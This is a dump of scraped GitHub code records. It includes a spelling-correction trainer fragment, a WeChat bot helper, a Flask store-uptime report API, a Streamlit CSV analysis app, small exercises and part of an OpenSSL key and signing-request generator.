[]\n results_detection = []\n results_text, results_pinyin = [], []\n results_tokens = []\n\n if cor_prob is not None:\n y_tokens = torch.argmax(cor_prob, dim=-1).cpu().numpy()\n if det_prob is not None:\n det_prob = det_prob.cpu().numpy()\n y_detection = (det_prob > self.judge_line)\n\n for sent_idx, t_len in enumerate(expand_text_lens):\n original_text = texts[sent_idx]\n original_tokens = self.tokenizer.tokenize(original_text)\n\n # correction\n _y_hat = y_tokens[sent_idx]\n predict_tokens = self.tokenizer.convert_ids_to_tokens(_y_hat[1: t_len])\n predict_tokens = [_tok if _tok != '[UNK]' else unk_sign for _tok in predict_tokens]\n # predict_text = self.tokenizer.convert_tokens_to_string(predict_tokens).replace(' ', '')\n \n for tok_idx, (original_tok, pred_tok) in enumerate(zip(original_tokens, predict_tokens)):\n if pred_tok == '[UNK]': \n predict_tokens[tok_idx] = original_tok # re-use the original text\n if pred_tok.startswith('##'):\n predict_tokens[tok_idx] = predict_tokens[tok_idx][2:]\n\n predict_text = \"\".join(predict_tokens)\n results_text.append(predict_text)\n results_tokens.append(predict_tokens)\n\n # also predict detection\n if det_prob is not None:\n prob_detection.append(det_prob[sent_idx][1: t_len])\n results_detection.append(y_detection[sent_idx][1: t_len])\n\n # also predict pinyin\n if self.cfg.MODEL.PREDICT_PINYINS:\n _y_pinyin = y_pinyins[sent_idx]\n predict_pinyins = self.convert_ids_to_pinyins(_y_pinyin[1: t_len])\n predict_pinyins = [_tok if _tok != '[UNK]' else unk_sign \n for _tok in predict_pinyins]\n results_pinyin.append(predict_pinyins)\n\n def join_shorter_results(_results):\n rst_temp = []\n pivot = 0\n for case_len in parts_rec:\n rst_temp.append(flatten(_results[pivot: pivot+case_len]))\n _results = rst_temp\n return _results\n\n # concat substrings\n if predict_shorter: \n prob_detection = join_shorter_results(prob_detection)\n results_detection = join_shorter_results(results_detection)\n results_text = join_shorter_results(results_text)\n results_pinyin = join_shorter_results(results_pinyin)\n\n if detail:\n max_length = max(map(len, prob_detection))\n prob_detection = np.stack(\n [np.concatenate([p, np.zeros(max_length-len(p))]) \n for p in prob_detection])\n prob_detection = np.around(prob_detection, decimals=5)\n results_detection = np.concatenate(results_detection)\n detail_info = {\n 'detection_prob': prob_detection,\n 'detection': results_detection,\n 'text': results_tokens, # 'correction'\n 'pinyin': results_pinyin,\n }\n return results_text, detail_info\n return results_text\n\n","repo_name":"okcd00/CDConfusor","sub_path":"exp/bert_based_models/engine/csc_trainer.py","file_name":"csc_trainer.py","file_ext":"py","file_size_in_byte":29371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2771161968","text":"from more_action import *\nfrom file_action import *\nfrom standard_print import printerr\n\n\ndef nickname(wxid_group):\n #update_group_member_details(port,wxid,wxid_group)\n wxid_de=get_wxid_details(wxid_group)\n nickname=wxid_de[\"data\"][\"nickName\"]\n return nickname\ndef wxid_form_cr(wxid,sender):\n if \"@chatroom\" in wxid:\n cda=get_chatroom_details_all(wxid)\n for x in cda['data']:\n if x[\"NickName\"] == sender or x[\"Alias\"] == sender or x[\"RoomNick\"] == sender:\n return x[\"UserName\"]\n else:\n printerr(\"Error for wxid is must be chatroom(wxid_form_cr)\")\n return\n \n","repo_name":"zwx08/Chino-wechat-bot","sub_path":"another_action_base.py","file_name":"another_action_base.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"669255287","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='intrinsic_hardness',\n version='0.0.1',\n author='Salil Bavdekar',\n author_email='salil.bavdekar@ufl.edu',\n description='Calculate intrinsic hardness of structures',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/salil91/intrinsic-hardness',\n project_urls={\n \"Bug Tracker\": \"https://github.com/salil91/intrinsic-hardness/issues\"\n },\n license='MIT',\n packages=['intrinsic_hardness'],\n install_requires=['pymatgen', 'click'],\n)\n","repo_name":"salil91/intrinsic-hardness","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1590434955","text":"class Solution:\n\n def letterCombinations(self, digits):\n \"\"\"\n 此题不用递归略有难度\n 核心算法为DFS\n :param digits:\n :return:\n \"\"\"\n refer_dict = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']\n }\n if digits == \"\":\n return []\n if len(digits) == 1:\n return refer_dict.get(digits[0])\n\n def dfs(num, string, rst):\n if num == length:\n rst.append(string)\n return None\n for letter in refer_dict.get(digits[num]):\n dfs(num + 1, string + letter, rst)\n\n rst = []\n length = len(digits)\n dfs(0, '', rst)\n return rst\n\n\nprint(Solution().letterCombinations('23'))\n\n","repo_name":"luanshiyinyang/LeetCode","sub_path":"0017-Letter Combinations of a Phone Number.py","file_name":"0017-Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30035826509","text":"from flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime, timedelta\nfrom datetime import datetime, timezone\nfrom flask_migrate import Migrate\nimport pytz\nimport csv\nimport uuid\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:SQLRakesh2022@127.0.0.1:3306/restaurantmonitor'\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n# Define the database models\nclass storetimezone(db.Model):\n store_id = db.Column(db.String(25), primary_key=True)\n timezone_str = db.Column(db.String(100))\n\nclass pollingdata(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n store_id = db.Column(db.String(25), db.ForeignKey('storetimezone.store_id'))\n timestamp_utc = db.Column(db.String(30)) \n status = db.Column(db.String(10))\n\nclass businesshours(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n store_id = db.Column(db.String(25), db.ForeignKey('storetimezone.store_id'))\n day_of_week = db.Column(db.Integer)\n start_time_local = db.Column(db.String(8))\n end_time_local = db.Column(db.String(8))\n\nclass report(db.Model):\n report_id = db.Column(db.String(50), primary_key=True)\n status = db.Column(db.String(20))\n file_path = db.Column(db.String(100))\n\n# Load data from CSV files and populate the database\ndef load_data_from_csv():\n # Load store data from timezone.csv\n with app.app_context():\n with open('store_timezone.csv', 'r') as file:\n reader = csv.reader(file)\n next(reader)\n for row in reader:\n store_id, timezone_str = row\n store = storetimezone(store_id=store_id, timezone_str=timezone_str)\n db.session.add(store)\n\n # Load business hours data from business_hours.csv\n with open('store_business_hours.csv', 'r') as file:\n reader = csv.reader(file)\n next(reader)\n for row in reader:\n store_id, day, start_time_local, end_time_local = row\n business_hours = businesshours(store_id=store_id, day_of_week=day,\n start_time_local=start_time_local, end_time_local=end_time_local)\n db.session.add(business_hours)\n\n with open('store_poll.csv', 'r') as file:\n csv_data = csv.DictReader(file)\n for row in csv_data:\n store_id = row['store_id']\n timestamp_utc = row['timestamp_utc']\n status = row['status']\n\n # Insert the record into the database\n new_polling_data = pollingdata(store_id=store_id, timestamp_utc=timestamp_utc, status=status)\n db.session.add(new_polling_data)\n\n db.session.commit()\n\n# Function to generate a unique report ID\ndef generate_report_id():\n return str(uuid.uuid4())\n\n# API endpoint to trigger report generation\n@app.route('/trigger_report', methods=['POST'])\ndef trigger_report():\n # Logic to generate the report\n current_timestamp = datetime.now()\n report_id = generate_report_id() # Implement a function to generate a unique report ID\n\n # Get the max timestamp among all observations\n max_timestamp = pollingdata.query.with_entities(pollingdata.timestamp_utc).order_by(pollingdata.timestamp_utc.desc()).first()[0]\n\n # Perform the report generation logic\n business_hours = businesshours.query.all()\n\n # Define report headers\n headers = ['store_id', 'uptime_last_hour(in minutes)', 'uptime_last_day(in hours)',\n 'update_last_week(in hours)', 'downtime_last_hour(in minutes)',\n 'downtime_last_day(in hours)', 'downtime_last_week(in hours)']\n \n report_data = [headers]\n\n # Iterate over each store\n stores = storetimezone.query.all()\n for store in stores:\n store_id = store.store_id\n timezone_str = store.timezone_str\n\n # Convert max timestamp to the store's timezone\n max_timestamp_store_tz = convert_utc_to_timezone(max_timestamp, timezone_str)\n\n # Calculate the time intervals for the report\n interval_last_hour_start = max_timestamp_store_tz - timedelta(hours=1)\n interval_last_day_start = max_timestamp_store_tz - timedelta(days=1)\n interval_last_week_start = max_timestamp_store_tz - timedelta(weeks=1)\n\n # Retrieve polling data within each time interval\n polling_data_last_hour = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_hour_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n polling_data_last_day = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_day_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n polling_data_last_week = pollingdata.query.filter(pollingdata.store_id == store_id,\n pollingdata.timestamp_utc >= interval_last_week_start,\n pollingdata.timestamp_utc <= max_timestamp).all()\n\n # Interpolate uptime and downtime based on the available polling data and business hours\n uptime_last_hour = interpolate_uptime(polling_data_last_hour, business_hours)\n uptime_last_day = interpolate_uptime(polling_data_last_day, business_hours)\n uptime_last_week = interpolate_uptime(polling_data_last_week, business_hours)\n\n downtime_last_hour = interpolate_downtime(polling_data_last_hour, business_hours)\n downtime_last_day = interpolate_downtime(polling_data_last_day, business_hours)\n downtime_last_week = interpolate_downtime(polling_data_last_week, business_hours)\n\n # Create a row for the store in the report data\n row = [store_id, uptime_last_hour, uptime_last_day, uptime_last_week,\n downtime_last_hour, downtime_last_day, downtime_last_week]\n report_data.append(row)\n\n # Save the report data to a CSV file\n file_path = f'D:/{report_id}.csv'\n with open(file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(report_data)\n\n # Update the report status and file path\n new_report = report(report_id=report_id, status='Complete', file_path=file_path)\n db.session.add(new_report)\n db.session.commit()\n\n return jsonify({'report_id': report_id})\n\n# API endpoint to retrieve the report status or the CSV file\n@app.route('/get_report', methods=['GET'])\ndef get_report():\n # Get the report ID from the request\n report_id = request.args.get('report_id')\n\n # Check if the report ID exists in the database\n report_item = report.query.get(report_id)\n if not report_item:\n return jsonify({'status': 'Report not found'})\n\n # Check the status of the report\n if report_item.status == 'Running':\n return jsonify({'status': 'Running'})\n elif report_item.status == 'Complete':\n # Return the CSV file with the schema described\n file_path = report_item.file_path\n with open(file_path, 'r') as file:\n csv_data = file.read()\n\n # Return the CSV file and status\n return jsonify({'status': 'Complete', 'report_csv': csv_data})\n\n return jsonify({'status': 'Unknown error'})\n\ndef convert_utc_to_timezone(utc_timestamp, timezone_str):\n utc = pytz.timezone('UTC')\n target_timezone = pytz.timezone(timezone_str)\n utc_time = utc.localize(utc_timestamp)\n target_time = utc_time.astimezone(target_timezone)\n return target_time\n\n# Utility function to interpolate uptime based on polling data and business hours\ndef interpolate_uptime(polling_data, business_hours):\n total_uptime = 0\n for data in polling_data:\n timestamp = datetime.strptime(data.timestamp_utc, '%Y-%m-%d %H:%M:%S')\n day_of_week = timestamp.weekday()\n\n # Find the corresponding business hours for the day of the week\n hours = next((hours for hours in business_hours if hours.store_id == data.store_id and hours.day_of_week == day_of_week), None)\n\n if hours:\n start_time = datetime.strptime(hours.start_time_local, '%H:%M:%S').time()\n end_time = datetime.strptime(hours.end_time_local, '%H:%M:%S').time()\n\n # Calculate the uptime based on the polling status and business hours\n if start_time <= timestamp.time() <= end_time and data.status == 'open':\n total_uptime += 1\n\n return total_uptime\n# Utility function to interpolate downtime based on polling data and business hours\ndef interpolate_downtime(polling_data, business_hours):\n total_downtime = 0\n for data in polling_data:\n timestamp = datetime.strptime(data.timestamp_utc, '%Y-%m-%d %H:%M:%S')\n day_of_week = timestamp.weekday()\n\n # Find the corresponding business hours for the day of the week\n hours = next((hours for hours in business_hours if hours.store_id == data.store_id and hours.day_of_week == day_of_week), None)\n\n if hours:\n start_time = datetime.strptime(hours.start_time_local, '%H:%M:%S').time()\n end_time = datetime.strptime(hours.end_time_local, '%H:%M:%S').time()\n\n # Calculate the downtime based on the polling status and business hours\n if start_time <= timestamp.time() <= end_time and data.status == 'closed':\n total_downtime += 1\n\n return total_downtime\n\n\nif __name__ == '__main__':\n load_data_from_csv()\n app.run(debug=True)\n","repo_name":"Roshan23R/Restaurant_Monitor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39866186648","text":"import streamlit as st\nimport pandas as pd\nfrom langchain.agents import create_csv_agent\nfrom langchain.llms import OpenAI\nimport boto3\nimport uuid\nfrom io import StringIO\nfrom tabulate import tabulate\n\n\ndef main():\n st.title(\"CSV-GPT\")\n st.write(\"Analyze your CSV file instantly\")\n\n if 'uploaded' not in st.session_state:\n st.session_state.uploaded = False\n st.session_state.s3_file_path = None\n\n uploaded_file = st.file_uploader(\"Upload a CSV file\", type=['csv'])\n\n bucket_name = 'csv-gpt-uploads'\n\n s3 = boto3.client(\n 's3',\n aws_access_key_id=st.secrets.aws_access_key_id,\n aws_secret_access_key=st.secrets.aws_secret_access_key\n )\n\n if uploaded_file is not None and not st.session_state.uploaded:\n df = pd.read_csv(uploaded_file)\n\n file_name = f\"{uuid.uuid4().hex}.csv\"\n\n csv_buffer = StringIO()\n df.to_csv(csv_buffer)\n\n s3.put_object(Body=csv_buffer.getvalue(), Bucket=bucket_name, Key=file_name)\n\n st.session_state.uploaded = True\n st.session_state.s3_file_path = f\"https://{bucket_name}.s3.amazonaws.com/{file_name}\"\n\n st.success('File Uploaded Successfully! Now Start Analyzing.')\n\n analysis_query = st.text_input(\"Enter the analysis query\")\n amended_query = \"\"\"\n Use the analysis query to analyse the uploaded CSV sheet {analysis_query}\n\n Always try to provide a quantitative output and present the results in a dataframe format\n \"\"\"\n\n if st.button(\"Analyze Now\"):\n if st.session_state.uploaded and st.session_state.s3_file_path is not None:\n agent = create_csv_agent(OpenAI(temperature=0, openai_api_key=st.secrets.openai_api_key),\n st.session_state.s3_file_path,\n Model='gpt-4'\n )\n result = agent.run(analysis_query)\n\n st.write(result)\n else:\n st.warning(\"Please upload a CSV file first.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sivasurend/goml-llm-usecase-leaderboard","sub_path":"CSV-GPT.py","file_name":"CSV-GPT.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14206354794","text":"import Book\nimport Library\nimport PriorityQueue\n\ndef add_to_library():\n\n title = input(\"What is the title of book?\")\n author = input(\"Who is the author of the book?\")\n year = input(\"What year was the book published?\")\n\n while not year.isdigit():\n year = input(\"Re-enter the year as a number,\\n'year' must be class int.\")\n\n genre = input(\"What genre is the book?\")\n\n book = Book.Book(str(title), str(author), int(year), str(genre))\n\n l.add_book(book)\n\n pq = input(\"Would you like to add this book to the Priority Queue? (yes/no)\")\n if pq == \"yes\":\n add_to_pq(book)\n \n\ndef remove_from_library():\n print(\"removes\")\n title = input(\"What is the title of the book you want to remove?\")\n author = input(\"Who is the author of the book you want to remove?\")\n\n l.remove_book(title, author)\n\n pq = input(\"Would you like to remove the highest priority book from the Priority Queue? (yes/no)\")\n \n if pq == \"yes\":\n rem_pq()\n\ndef view_library():\n sort_l = input(\"Would you like to view a sorted Library? (yes/no)\")\n if sort_l == \"yes\":\n l.sort()\n print(l)\n\n view_min = input(\"Would you like to view the highest priority book? (yes/no)\")\n\n if view_min == \"yes\":\n view_min_pq()\n\n view_pq = input(\"Would you like to view the Priority Queue? (yes/no)\")\n\n if view_pq == \"yes\":\n view_priorityq()\n\ndef add_to_pq(b):\n l.add_pq(b)\n\ndef rem_pq():\n l.remove_pq()\n\ndef view_min_pq():\n print(l.next_pq())\n\ndef view_priorityq():\n print(l.get_pq())\n\n\nadd = input(\"Would you like to create a new Library? (yes/no)\")\nif add == \"yes\":\n l = Library.Library()\n\nwhile add == \"yes\":\n next_step = input(\"Would you like to add a book (add), remove a book (remove),\\nview the library (view), or end the program (end)?\")\n if next_step == \"add\":\n add_to_library()\n add = \"yes\"\n elif next_step == \"remove\":\n remove_from_library()\n add = \"yes\"\n elif next_step == \"view\":\n view_library()\n add = \"yes\"\n else:\n #re do this print statement later\n print(\"You elected to end the program,\\nor entered unrecognizable input.\")\n add = \"no\"\n\n\n","repo_name":"meganEwillis/CS232_datastructures","sub_path":"book_driver.py","file_name":"book_driver.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30542028020","text":"from autocode import utils\nfrom autocode import settings\n\ndef render(enum, owner):\n enum.remove_all_props('param')\n constructor_params = enum.params\n if enum.value_type is None:\n raise Exception('Enums must have type')\n\n if enum.extends is not None:\n raise Exception('Enums cannot extend other classes')\n\n comments = enum.render_comment()\n if comments == utils.EMPTY_COMMENT and settings.get_redundant_doctag_setting() is False:\n result = []\n else:\n result = ['/**', comments, ' */']\n\n indent_result = []\n implements_string = ''\n if enum.implements is not None:\n implements_string += ' implements %s' % ', '.join(enum.implements)\n\n\n indent_result.append(\"%s enum %s%s {\" % (enum.visibility, enum.name, implements_string))\n i = 1\n for key, value in sorted(enum.values):\n if value is None:\n enum_str = key\n else:\n enum_str = \"%s(%s)\" % (key, value)\n\n if i < len(enum.values):\n indent_result.append(enum_str + ',')\n else:\n indent_result.append(enum_str + ';')\n i += 1\n\n # Fields\n if len(enum.fields) > 0:\n indent_result.append(\"\\n\")\n indent_result.extend(x.render(enum) for x in utils.sort_fields(enum.fields.values()))\n indent_result.append(\"\\n\")\n\n from autocode.primitives import Function\n if enum.constructor is not None and enum.constructor != '':\n constructor_func = Function(enum.name, params=constructor_params)\n constructor_func.visibility = enum.visibility\n constructor_func.body = enum.constructor\n constructor_func.compile(enum)\n indent_result.append(constructor_func.render(enum))\n indent_result.append('')\n\n\n\n if len(enum.methods) > 0:\n methods = []\n preferred_methods = set()\n for preferred_method in enum._method_order:\n methods.append(enum.methods[preferred_method])\n preferred_methods.add(preferred_method)\n methods.extend(v for v in utils.sort_methods(enum.methods.values()) if v.name not in preferred_methods)\n\n indent_result.append(\"\\n\\n\".join(x.render(enum) for x in methods))\n\n result.append(\"\\n\".join(indent_result).replace(\"\\n\", \"\\n \"))\n result.append('}')\n return \" \\n\".join(result)\n","repo_name":"theRobinator/autocode","sub_path":"renderers/java/enumrenderer.py","file_name":"enumrenderer.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17600720465","text":"from SBString import *\nimport random\n\nreplicates = 300\ndebug = 0\n\ndef dprint( txt):\n\tglobal debug\n\tif debug > 0:\n\t\tprint(txt)\n\treturn(0)\n\ndef testblock(q, action, start, txt='', del_count=-1):\n\tif action=='i':\n\t\tdprint('----------- inserting starting at ' + str(start) + ' txt=' + txt)\n\t\ts = txt\n\t\tl = []\n\t\tl.extend(q.get_string())\n\t\tl.insert(start, txt)\n\t\tq.insert(start, txt)\n\t\tdprint(''.join(l))\n\t\tdprint(q.get_string())\n\t\tassert(''.join(l) == q.get_string())\n\tif action == 'd':\n\t\tdprint('----------- deleting starting at ' + str(start) + ' count:' + str(del_count))\n\t\ts = txt\n\t\tl = []\n\t\tl.extend(q.get_string())\n\t\t#l.delete(start, del_count)\n\t\tdel l[start: start + del_count]\n\t\tq.delete(start, del_count)\n\t\tdprint('l: ' + ''.join(l))\n\t\tdprint('q: ' + q.get_string())\n\t\tassert(''.join(l) == q.get_string())\n\treturn(0)\n\t#print('*state: ' + q.show_state())\n\t#print('\t\t\t012345678901234567890')\n\t#print('*str: ' + q.get_string())\n\t#print('- - - - - - - - - - ')\n######################################################################\n#\ndef random_string(len):\n\ts = ''\n\tfor k in range(len):\n\t\tspace_test = int(random.expovariate(.5)) + 1\n\t\tif space_test > 5:\n\t\t\ts += ' '\n\t\telse:\n\t\t\ts += chr(random.randint(ord('a'), ord('z')))\n\treturn(s)\n\n\n######################################################################\n\nprint('Running ' + str(replicates) + ' inserts and delete ')\nq = SBString('hello world')\n#q.insert(len(q.get_string()), 'z')\n\nfor r in range(replicates):\n\tt = random.randint(0, 1)\n\tif t > .5:\n\t\tcode = 'i'\n\telse:\n\t\tcode = 'd'\n\tif len(q) < 10:\n\t\tcode = 'i'\n\ttestblock(q, code, 3, txt=random_string(random.randint(1, 10)), del_count=random.randint(1, 4))\n\n","repo_name":"rehoot/SBList","sub_path":"SBStest01.py","file_name":"SBStest01.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37168396477","text":"#!/usr/bin/python3\n\"\"\"\ncertiPy.py: An OpenSSL Tool for generating private keys and signing requests from a JSON file.\n\nAuthor: [Author Name]\nCompany: [Company Name]\n\nUsage: certiPy.py [-h] -i [-ol] [-n] [-c] [-d] [-y] [-opk] [-ipk] [-t] [-b] [-osr] [-conf] [-dig]\n\n options:\n -h, --help show this help message and exit\n\n input:\n -i , --input input file [JSON]\n\n logging:\n -ol , --output-log output path logs [default=/logs]\n\n input filter:\n -n , --network network name to generate private key and signing request for\n -c , --cluster cluster name to generate private key and signing request for\n\n terminal output:\n -d, --debug set to get debug output [default=False]\n -y, --skip-checking set to skip SSL parameter checking [default=False]\n\n private key generation:\n -opk , --output-pk output path private keys [default=/keys]\n -ipk , --input-pk prepared private key [default=None]\n -t , --type file type [default=pem]\n -b , --bits key size in bits (2048/4096/8192) [default=4096]\n\n signing request generation:\n -osr , --output-sr output path signing requests [default=/reqs]\n -conf , --config prepared config file for generating signing request [default=None]\n -dig , --digest hash function for generating the signing request (sha256/sha384/sha512) [default=sha256]\n\n\nExample:\n certiPy.py -i data.json\n\nThe input file should be in JSON format and contain the following fields:\n [\n {\n \"Network\": \"\",\n \"Cluster\":\n [\n {\n \"dns_alias_tech_cluster\": \"\",\n \"ip\": \"\",\n \"dns_alias_human_cluster\": \"\",\n \"machines\":\n [\n {\n \"machine\": \"\",\n \"dns_alias_tech_machine\": \"\",\n \"ipv4_address\": \"\",\n \"dns_alias_human_machine\": \"\"\n },\n {\n \"machine\": \"\",\n \"dns_alias_tech_machine\": \"\",\n \"ipv4_address\": \"\",\n \"dns_alias_human_machine\": \"\"\n },\n ]\n },\n {\n .\n .\n .\n }\n ]\n },\n {\n .\n .\n .\n }\n ]\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport stat\nimport subprocess\nimport json\nimport datetime\nimport re\n\n\n# Main ------------------------------------------------------------------------------------------------------------------------------------------------- #\ndef main(args: argparse.Namespace):\n \"\"\"\n The main function of the SSL tool.\n\n This function takes as input the argparse.Namespace object containing the parsed arguments and performs the main operations of the tool.\n It creates the necessary directories, loads the JSON data, generates private keys and signing requests, and logs the results.\n\n Args:\n args (argparse.Namespace): The parsed arguments.\n\n Logs:\n logging.info: Information about the generated private keys and signing requests.\n \"\"\"\n\n handle_directories(args.output_pk, args.output_sr)\n source = load_json_data(args.input)\n\n count_pk = count_sr = 0\n\n for cluster in get_clusters(source, args.network, args.cluster):\n try:\n private_key, count_pk = generate_private_keys(cluster.get(\"cluster\"), args.type, args.output_pk, args.input_pk, args.bits, args.debug, count_pk)\n signing_request, count_sr = generate_signing_requests(cluster, private_key, args.output_sr, args.config, args.digest, args.skip_checking, args.debug, count_sr)\n except Exception as e:\n logging.exception(f\"Failed to process cluster {cluster}: {e}\")\n continue\n\n print(\"-\" * os.get_terminal_size().columns)\n\n logging.info(f\"{count_pk} private keys generated.\")\n logging.info(f\"{count_sr} signing requests generated.\")\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Argument Parser -------------------------------------------------------------------------------------------------------------------------------------- #\ndef parse_arguments() -> argparse.Namespace:\n \"\"\"\n Parse command line arguments using argparse module.\n\n Returns:\n args (argparse.Namespace): Namespace object returned by argparse.ArgumentParser.parse_args() method, containing the values of the parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A simple SSL tool to automatically generate private keys and signing request from a JSON file.\", prog=\"certiPy.py\")\n\n # input\n required_args = parser.add_argument_group(\"input\")\n required_args.add_argument(\"-i\", \"--input\", type=str, required=True, metavar=\"\", help=\"input file [JSON]\")\n\n # logging\n logging_group = parser.add_argument_group(\"logging\")\n logging_group.add_argument(\"-ol\", \"--output-log\", type=str, required=False, default=\"logs\", metavar=\"\", help=\"output path logs [default=/logs]\")\n\n # filter input\n input_filter_group = parser.add_argument_group(\"input filter\")\n input_filter_group.add_argument(\"-n\", \"--network\", type=str,required=False, default=None, metavar=\"\", help=\"network name to generate private key and signing request for\")\n input_filter_group.add_argument(\"-c\", \"--cluster\", type=str,required=False, default=None, metavar=\"\", help=\"cluster name to generate private key and signing request for\")\n\n # output config\n terminal_output_group = parser.add_argument_group(\"terminal output\")\n terminal_output_group.add_argument(\"-d\", \"--debug\", required=False, default=False, action=\"store_true\", dest=\"debug\", help=\"set to get debug output [default=False]\")\n terminal_output_group.add_argument(\"-y\", \"--skip-checking\", required=False, default=False, action=\"store_true\", dest=\"skip_checking\", help=\"set to skip SSL parameter checking [default=False]\")\n\n # private keys\n private_key_generation_group = parser.add_argument_group(\"private key generation\")\n private_key_generation_group.add_argument(\"-opk\", \"--output-pk\", type=str, required=False, default=\"keys\", metavar=\"\", help=\"output path private keys [default=/keys]\")\n private_key_generation_group.add_argument(\"-ipk\", \"--input-pk\", type=str, required=False, default=None, metavar=\"\", help=\"prepared private key [default=None]\")\n private_key_generation_group.add_argument(\"-t\", \"--type\", type=str, required=False, default=\"pem\", metavar=\"\", help=\"file type [default=pem]\")\n private_key_generation_group.add_argument(\"-b\", \"--bits\", type=int, required=False, default=4096, choices=[2048, 4096, 8192], metavar=\"\", help=\"key size in bits (2048/4096/8192) [default=4096]\")\n\n # signing requests\n signing_request_generation_group = parser.add_argument_group(\"signing request generation\")\n signing_request_generation_group.add_argument(\"-osr\", \"--output-sr\", type=str, required=False, default=\"reqs\", metavar=\"\", help=\"output path signing requests [default=/reqs]\")\n signing_request_generation_group.add_argument(\"-conf\", \"--config\", type=str, required=False, default=None, metavar=\"\", help=\"prepared config file for generating signing request [default=None]\")\n signing_request_generation_group.add_argument(\"-dig\", \"--digest\", type=str, required=False, default=\"sha256\", choices=[\"sha256\", \"sha384\", \"sha512\"], metavar=\"\", help=\"hash function for generating the signing request (sha256/sha384/sha512) [default=sha256]\")\n\n args = parser.parse_args()\n check_arguments(parser, args)\n\n return args\n\n\ndef check_arguments(parser: argparse.ArgumentParser, args: argparse.Namespace):\n \"\"\"\n Check the validity of the provided arguments.\n\n Arguments:\n parser (argparse.ArgumentParser): The ArgumentParser instance used to parse the command-line arguments.\n args (argparse.Namespace): The Namespace object containing the parsed command-line arguments.\n\n Raises:\n argparse.ArgumentTypeError: If the input file is not a .json file.\n argparse.ArgumentTypeError: If input files can not be found.\n argparse.ArgumentTypeError: If input files do not have reading permission.\n \"\"\"\n # check input file format\n _, file_extension = os.path.splitext(args.input)\n if file_extension != \".json\":\n parser.error(f\"Input file must be a .json file, got {file_extension}\")\n\n # make absolute paths\n cwd = os.getcwd()\n for attr in [\"input\", \"output_log\", \"output_pk\", \"output_sr\", \"input_pk\", \"config\"]:\n file = getattr(args, attr)\n if file and not os.path.isabs(file):\n setattr(args, attr, f\"{cwd}/{file}\")\n\n # check if input files exists\n for file in [args.input, args.input_pk, args.config]:\n if file and not os.path.isfile(file):\n parser.error(f\"File not found: {file}\")\n\n # check input files read permission\n for file in [args.input, args.input_pk, args.config]:\n if file and not os.access(file, os.R_OK):\n parser.error(f\"Missing permission to read file: {file}\")\n\n # remove leading dot from key file extension/type\n args.type = args.type.strip().lstrip(\".\")\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# Logging ---------------------------------------------------------------------------------------------------------------------------------------------- #\ndef setup_logging(log_dir: str):\n \"\"\"\n Setup logging configuration.\n\n Arguments:\n log_dir (str): The directory where the log files will be stored.\n\n Logs:\n Main log file will be saved at `log_dir/main.log` and it will include the timestamp, logging level, message, filename and line number.\n \"\"\"\n os.makedirs(log_dir, exist_ok=True)\n\n FORMAT = \"%(asctime)s [%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\"\n logging.basicConfig(level=logging.DEBUG, format=FORMAT, handlers=[logging.FileHandler(f\"{log_dir}/main.log\"), logging.StreamHandler()])\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ #\n\n# JSON Data Handling ----------------------------------------------------------------------------------------------------------------------------------- #\ndef load_json_data(source: str) -> list:\n \"\"\"\n Load data from a JSON file.\n\n Arguments:\n source (str): The path of the file from which the data is to be loaded.\n\n Returns:\n data (dict): The data loaded from the file.\n\n Raises:\n FileNotFoundError: If the file is not found.\n json.JSONDecodeError: If there was an error decoding the JSON data.\n\n Logs:\n logging.info: Information about the data that was loaded.\n logging.error: Information about any errors encountered while loading the data.\n \"\"\"\n try:\n with open(source, \"r\") as file:\n data = json.load(file)\n logging.info(f\"Data loaded from file: {source}\")\n data = validate_data(data)\n return data\n except FileNotFoundError:\n logging.error(f\"File not found: {source}\")\n exit(1)\n except json.JSONDecodeError as e:\n 